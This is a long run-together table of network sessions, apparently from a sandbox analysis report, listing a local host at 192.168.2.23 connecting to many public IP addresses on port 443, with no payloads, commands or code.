                                                21909192.168.2.2357888148.83.84.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21910192.168.2.235650838.58.119.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21911192.168.2.235278814.165.198.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21912192.168.2.23565824.245.150.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21913192.168.2.2337770118.182.155.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21914192.168.2.2347300188.193.120.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21915192.168.2.2359580189.225.217.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21916192.168.2.2351046179.229.212.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21917192.168.2.2347780199.206.169.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21918192.168.2.2340962180.0.114.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21919192.168.2.235816472.206.158.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21920192.168.2.2353322193.24.212.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21921192.168.2.2353068174.219.107.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21922192.168.2.2350612164.228.246.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21923192.168.2.233865280.37.153.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21924192.168.2.233504074.94.6.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21925192.168.2.2356912175.240.29.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21926192.168.2.2343548132.16.98.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21927192.168.2.2338462201.224.148.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21928192.168.2.235795631.173.100.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21929192.168.2.23508304.11.7.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21930192.168.2.2355268110.201.23.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21931192.168.2.2357854147.140.104.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21932192.168.2.2335278194.107.16.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21933192.168.2.234966882.195.149.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21934192.168.2.2336154111.127.175.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21935192.168.2.2333336143.101.200.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21936192.168.2.2351202204.45.79.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21937192.168.2.233358843.60.211.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21938192.168.2.2344298218.249.172.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21939192.168.2.2355176117.35.201.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21940192.168.2.2344802159.195.127.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21941192.168.2.234144893.78.250.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21942192.168.2.2360706116.205.143.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21943192.168.2.2356396145.62.185.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21944192.168.2.234365282.99.20.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21945192.168.2.235364459.230.88.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21946192.168.2.235522683.203.188.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21947192.168.2.2346924133.70.61.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21948192.168.2.234000249.115.237.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21949192.168.2.2335676116.160.9.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21950192.168.2.235883696.54.14.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21951192.168.2.2342638137.161.39.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21952192.168.2.2344294125.198.255.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21953192.168.2.235833679.170.138.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21954192.168.2.2342496184.12.106.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21955192.168.2.2341402123.4.79.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21956192.168.2.2360988206.180.148.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21957192.168.2.2335874155.102.195.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21958192.168.2.235005866.88.123.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21959192.168.2.2357806144.247.223.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21960192.168.2.2351270125.55.90.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21961192.168.2.2351428167.74.67.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21962192.168.2.234894684.78.1.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21963192.168.2.2346208207.211.168.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21964192.168.2.2347832147.21.228.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21965192.168.2.2349322210.81.136.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21966192.168.2.2358132202.152.186.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21967192.168.2.2337536195.3.179.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21968192.168.2.2336234134.30.95.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21969192.168.2.2343242155.104.149.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21970192.168.2.233865414.230.185.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21971192.168.2.234159288.185.189.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21972192.168.2.2354466209.239.8.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21973192.168.2.2333352223.87.158.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21974192.168.2.2349062163.1.54.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21975192.168.2.2359564102.28.109.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21976192.168.2.234853075.104.176.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21977192.168.2.2345276119.168.186.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21978192.168.2.2335594133.202.251.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21979192.168.2.235595690.152.191.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21980192.168.2.2358926197.80.87.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21981192.168.2.23352142.50.101.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21982192.168.2.2352012181.68.52.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21983192.168.2.2347856188.102.3.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21984192.168.2.2360018212.195.147.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21985192.168.2.2345334221.23.27.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21986192.168.2.2343020124.90.131.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21987192.168.2.2356480152.251.86.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21988192.168.2.2339140193.206.61.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21989192.168.2.2352812173.224.52.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21990192.168.2.2359084217.0.235.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21991192.168.2.2360732124.19.190.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21992192.168.2.2338908185.161.170.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21993192.168.2.2337890103.73.225.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21994192.168.2.2338554219.116.67.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21995192.168.2.2355498175.157.225.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21996192.168.2.2343654103.18.133.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21997192.168.2.2339380102.161.54.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21998192.168.2.234034635.151.239.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21999192.168.2.234246420.217.205.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22000192.168.2.2335718115.137.6.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22001192.168.2.2358626218.201.135.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22002192.168.2.234990264.238.47.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22003192.168.2.233607284.148.201.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22004192.168.2.235085853.52.75.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22005192.168.2.2346646133.151.34.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22006192.168.2.2340722159.22.20.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22007192.168.2.2355348146.88.148.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22008192.168.2.2337676113.223.43.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22009192.168.2.2340976142.88.160.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22010192.168.2.2346448183.218.117.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22011192.168.2.2338144140.194.152.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22012192.168.2.2337012135.84.144.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22013192.168.2.236076813.137.147.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22014192.168.2.2354502172.247.38.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22015192.168.2.233689814.221.141.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22016192.168.2.234922280.242.15.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22017192.168.2.234641075.70.212.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22018192.168.2.234656089.104.239.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22019192.168.2.2344586115.170.158.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22020192.168.2.2333476117.80.159.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22021192.168.2.2357368144.107.93.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22022192.168.2.23330465.243.121.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22023192.168.2.23336909.135.211.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22024192.168.2.2349196166.37.96.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22025192.168.2.233357871.109.102.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22026192.168.2.233373457.13.50.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22027192.168.2.235741019.167.164.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22028192.168.2.234028875.102.196.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22029192.168.2.23515824.117.48.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22030192.168.2.2335946210.169.218.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22031192.168.2.2352022165.46.147.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22032192.168.2.2355002163.110.226.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22033192.168.2.2349192203.56.116.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22034192.168.2.234599051.178.79.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22035192.168.2.2354944128.2.150.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22036192.168.2.2338972210.225.91.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22037192.168.2.235472640.185.248.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22038192.168.2.2334502183.9.243.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22039192.168.2.2343242109.40.130.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22040192.168.2.2340604140.208.191.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22041192.168.2.234851813.32.175.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22042192.168.2.2342236170.136.56.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22043192.168.2.235059424.135.36.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22044192.168.2.2342228207.240.7.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22045192.168.2.2345546105.100.32.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22046192.168.2.234323277.102.93.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22047192.168.2.2359270142.239.110.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22048192.168.2.2341314132.87.202.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22049192.168.2.2335108133.255.174.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22050192.168.2.235348018.55.52.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22051192.168.2.2360992167.67.158.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22052192.168.2.2340346205.56.126.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22053192.168.2.234473820.85.182.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22054192.168.2.2357068223.135.96.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22055192.168.2.2333636165.226.142.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22056192.168.2.234656471.59.21.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22057192.168.2.2349018184.43.43.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22058192.168.2.2337850143.14.234.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22059192.168.2.234147862.253.190.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22060192.168.2.2345960109.66.94.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22061192.168.2.2357304203.5.130.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22062192.168.2.2347002152.132.166.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22063192.168.2.234165676.213.24.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22064192.168.2.2346996185.113.175.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22065192.168.2.2336250164.133.239.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22066192.168.2.2338586129.92.168.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22067192.168.2.235797265.62.255.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22068192.168.2.233732261.156.238.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22069192.168.2.2341152129.167.72.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22070192.168.2.236062631.121.46.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22071192.168.2.234809483.46.185.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22072192.168.2.234558637.120.24.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22073192.168.2.234978443.137.229.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22074192.168.2.233498687.85.147.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22075192.168.2.2346808193.226.228.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22076192.168.2.235750090.227.205.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22077192.168.2.2333024130.225.233.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22078192.168.2.233510265.236.123.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22079192.168.2.234073463.126.3.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22080192.168.2.2336942180.212.86.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22081192.168.2.2338412132.187.222.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22082192.168.2.2356676179.175.53.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22083192.168.2.2350438218.22.214.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22084192.168.2.2334272122.133.67.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22085192.168.2.235542290.53.75.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22086192.168.2.2352518130.33.30.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22087192.168.2.233402845.99.89.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22088192.168.2.2346742203.59.32.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22089192.168.2.2353502124.159.242.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22090192.168.2.234364277.178.246.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22091192.168.2.233318219.54.175.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22092192.168.2.2335006179.86.129.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22093192.168.2.2337632145.83.15.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22094192.168.2.2332990163.148.120.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22095192.168.2.23573281.183.251.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22096192.168.2.2352214179.85.86.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22097192.168.2.234073427.172.99.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22098192.168.2.234092218.189.231.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22099192.168.2.235193443.15.35.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22100192.168.2.2360878145.129.177.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22101192.168.2.2338990177.208.92.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22102192.168.2.2353696156.206.94.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22103192.168.2.234388038.131.13.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22104192.168.2.2351100176.219.167.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22105192.168.2.2341638144.198.11.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22106192.168.2.235001257.167.241.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22107192.168.2.2344380167.120.33.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22108192.168.2.235401237.38.18.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22109192.168.2.235370454.44.139.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22110192.168.2.2343898156.83.221.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22111192.168.2.235557676.1.170.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22112192.168.2.2341722142.76.210.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22113192.168.2.2344636206.111.231.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22114192.168.2.2348918170.122.103.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22115192.168.2.2349460198.228.137.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22116192.168.2.236091213.232.119.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22117192.168.2.2343706103.23.255.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22118192.168.2.2336700105.140.20.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22119192.168.2.2335612125.216.171.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22120192.168.2.2356852150.87.203.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22121192.168.2.234851649.219.16.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22122192.168.2.236058243.185.143.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22123192.168.2.2339902187.141.184.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22124192.168.2.2351410131.52.48.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22125192.168.2.233666468.75.217.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22126192.168.2.2349442200.159.190.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22127192.168.2.2357812134.6.187.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22128192.168.2.2347748208.53.162.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22129192.168.2.2335088213.26.0.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22130192.168.2.2336370151.136.221.82443
                                                TimestampBytes transferredDirectionData


